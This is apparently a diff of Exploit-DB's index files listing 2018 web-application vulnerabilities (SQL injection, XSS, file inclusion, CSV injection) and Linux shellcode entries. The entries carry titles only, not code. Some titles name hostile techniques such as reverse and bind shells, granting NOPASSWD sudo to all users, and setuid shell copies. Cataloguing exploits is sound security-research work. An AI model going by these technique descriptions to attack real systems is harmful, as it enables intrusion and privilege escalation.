 44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80
 44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java,
+44535,exploits/php/webapps/44535.txt,"Blog Master Pro v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
+44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM v1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php,
+44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php,
+44538,exploits/php/webapps/44538.txt,"HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting",2018-04-25,8bitsec,webapps,php,
+44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php,

files_shellcodes.csv

@@ -874,9 +874,9 @@ id,file,description,date,author,type,platform
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
 44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
-44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
-44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode",2018-04-24,absolomb,shellcode,linux_x86
-44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86
+44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
-44510,shellcodes/linux_x86/44510.c,"Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
-44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
+44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
+44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86